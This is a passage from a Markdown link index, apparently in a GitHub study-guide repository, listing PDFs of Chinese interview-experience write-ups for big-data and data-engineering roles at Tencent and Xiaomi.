腾讯音乐数据工程笔试](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/4.13%20%E8%85%BE%E8%AE%AF%E9%9F%B3%E4%B9%90%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E7%AC%94%E8%AF%95.pdf) -[2024届秋招总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/2024%E5%B1%8A%E7%A7%8B%E6%8B%9B%E6%80%BB%E7%BB%93.pdf) -[5.30腾讯数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/5.30%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[9.20-腾讯云智-数据-二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/9.20-%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA-%E6%95%B0%E6%8D%AE-%E4%BA%8C%E9%9D%A2.pdf) -[【腾讯】后端开发暑期实习面经(已offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E3%80%90%E8%85%BE%E8%AE%AF%E3%80%91%E5%90%8E%E7%AB%AF%E5%BC%80%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E5%B7%B2offer%EF%BC%89.pdf) 
-[一面凉经-腾讯技术研究-数据科学](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F-%E8%85%BE%E8%AE%AF%E6%8A%80%E6%9C%AF%E7%A0%94%E7%A9%B6-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6.pdf) -[大数据开发实习面经(阿里、360、腾讯)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F%EF%BC%88%E9%98%BF%E9%87%8C%E3%80%81360%E3%80%81%E8%85%BE%E8%AE%AF%EF%BC%89.pdf) -[奇怪的csig数据工程timeline](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%A5%87%E6%80%AA%E7%9A%84csig%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8Btimeline.pdf) -[字节腾讯大数据凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E5%AD%97%E8%8A%82%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%87%89%E7%BB%8F.pdf) -[百度腾讯提前批阿里校招面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E7%99%BE%E5%BA%A6%E8%85%BE%E8%AE%AF%E6%8F%90%E5%89%8D%E6%89%B9%E9%98%BF%E9%87%8C%E6%A0%A1%E6%8B%9B%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 TEG 后台开发 大数据方向 
一面总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20TEG%20%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%96%B9%E5%90%91%20%E4%B8%80%E9%9D%A2%E6%80%BB%E7%BB%93.pdf) -[腾讯 偏大数据开发三面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%89%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 偏大数据开发二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 偏大数据开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E5%81%8F%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯 数据科学暑期实习 一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2.pdf) 
-[腾讯-数据科学(IEG)+数据工程](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF-%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%EF%BC%88IEG%EF%BC%89%2B%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B.pdf) -[腾讯CSIG后台开发一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%90%8E%E5%8F%B0%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯CSIG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFCSIG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯IEG数据中心实习面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFIEG%E6%95%B0%E6%8D%AE%E4%B8%AD%E5%BF%83%E5%AE%9E%E4%B9%A0%E9%9D%A2%E7%BB%8F.pdf) -[腾讯PCG数据研发暑期实习一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFPCG%E6%95%B0%E6%8D%AE%E7%A0%94%E5%8F%91%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) 
-[腾讯TEG-数据平台部-大数据开发实习-一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%B8%80%E9%9D%A2.pdf) -[腾讯TEG-数据平台部-大数据开发实习-二面(等凉)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG-%E6%95%B0%E6%8D%AE%E5%B9%B3%E5%8F%B0%E9%83%A8-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0-%E4%BA%8C%E9%9D%A2%EF%BC%88%E7%AD%89%E5%87%89%EF%BC%89.pdf) -[腾讯TEG大数据一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFTEG%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯teg大数据 凉](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AFteg%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E5%87%89.pdf) -[腾讯云智 数据工程 面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%20%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E9%9D%A2%E7%BB%8F.pdf) -[腾讯云智暑期实习-数据工程 
一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E4%BA%91%E6%99%BA%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0-%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%20%E4%B8%80%E9%9D%A2.pdf) -[腾讯大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[腾讯大数据开发实习](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%AE%9E%E4%B9%A0.pdf) -[腾讯微保实习一面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%B8%80%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) -[腾讯微保实习二面(数据开发工程师)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%9D%E5%AE%9E%E4%B9%A0%E4%BA%8C%E9%9D%A2%EF%BC%88%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88%EF%BC%89.pdf) -[腾讯微信读书 数据科学 暑期实习 
一面【放弃笔试但被捞】](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E5%BE%AE%E4%BF%A1%E8%AF%BB%E4%B9%A6%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%20%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E4%B8%80%E9%9D%A2%E3%80%90%E6%94%BE%E5%BC%83%E7%AC%94%E8%AF%95%E4%BD%86%E8%A2%AB%E6%8D%9E%E3%80%91.pdf) -[腾讯数开面筋-全程无八股](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E5%BC%80%E9%9D%A2%E7%AD%8B-%E5%85%A8%E7%A8%8B%E6%97%A0%E5%85%AB%E8%82%A1.pdf) -[腾讯数据工程凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E5%87%89%E7%BB%8F.pdf) -[腾讯数据工程面经(1)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%881%EF%BC%89.pdf) -[腾讯数据工程面经(2)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%95%B0%E6%8D%AE%E5%B7%A5%E7%A8%8B%E9%9D%A2%E7%BB%8F%EF%BC%882%EF%BC%89.pdf) -[腾讯暑期实习 
数据科学一面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E6%9A%91%E6%9C%9F%E5%AE%9E%E4%B9%A0%20%E6%95%B0%E6%8D%AE%E7%A7%91%E5%AD%A6%E4%B8%80%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) -[腾讯秋招大数据运维开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E8%85%BE%E8%AE%AF%E7%A7%8B%E6%8B%9B%E5%A4%A7%E6%95%B0%E6%8D%AE%E8%BF%90%E7%BB%B4%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) -[阿里、腾讯大数据提前批面经(已拿offer)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%98%BF%E9%87%8C%E3%80%81%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%E6%8F%90%E5%89%8D%E6%89%B9%E9%9D%A2%E7%BB%8F(%E5%B7%B2%E6%8B%BFoffer).pdf) -[面试复盘|腾讯-腾讯大数据 一面凉经!!!](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E8%85%BE%E8%AE%AF/%E8%85%BE%E8%AE%AF-2023%E5%B9%B411%E6%9C%8812%E6%97%A5/%E9%9D%A2%E8%AF%95%E5%A4%8D%E7%9B%98%EF%BD%9C%E8%85%BE%E8%AE%AF-%E8%85%BE%E8%AE%AF%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F%EF%BC%81%EF%BC%81%EF%BC%81.pdf) - - -#### 小米面经 -[2023-3-27 小米-汽车-大数据开发](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/2023-3-27%20%E5%B0%8F%E7%B1%B3-%E6%B1%BD%E8%BD%A6-%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91-1.pdf) -[小米 大数据 一面 
二面(凉经)](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%20%E4%B8%80%E9%9D%A2%20%E4%BA%8C%E9%9D%A2%EF%BC%88%E5%87%89%E7%BB%8F%EF%BC%89.pdf) -[小米 大数据开发 一面视频面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E4%B8%80%E9%9D%A2%E8%A7%86%E9%A2%91%E9%9D%A2.pdf) -[小米 大数据开发 已oc](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%20%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%20%E5%B7%B2oc.pdf) -[小米、头条、知乎面试题总结](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E3%80%81%E5%A4%B4%E6%9D%A1%E3%80%81%E7%9F%A5%E4%B9%8E%E9%9D%A2%E8%AF%95%E9%A2%98%E6%80%BB%E7%BB%93_%E4%B8%8D%E6%B8%85%E4%B8%8D%E6%85%8E%E7%9A%84%E5%8D%9A%E5%AE%A2-CSDN%E5%8D%9A%E5%AE%A2.pdf) -[小米凉面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%87%89%E9%9D%A2.pdf) -[小米大数据一二面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2.pdf) -[小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) 
-[小米大数据一二面面经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E4%B8%80%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F02.pdf) -[小米大数据开发一面](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2.pdf) -[小米大数据开发一面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%B8%80%E9%9D%A2%E5%87%89%E7%BB%8F.pdf) -[小米大数据开发二面凉经](https://github.com/MoRan1607/BigDataGuide/blob/master/%E9%9D%A2%E8%AF%95/%E9%9D%A2%E7%BB%8F/%E5%A4%A7%E6%95%B0%E6%8D%AE%E9%9D%A2%E7%BB%8F/%E5%B0%8F%E7%B1%B3/%E5%B0%8F%E7%B1%B3%E5%A4%A7%E6%95%B0%E6%8D%AE%E5%BC%80%E5%8F%91%E4%BA%8C%E9%9D%A2%E9%9D%A2%E7%BB%8F.pdf) 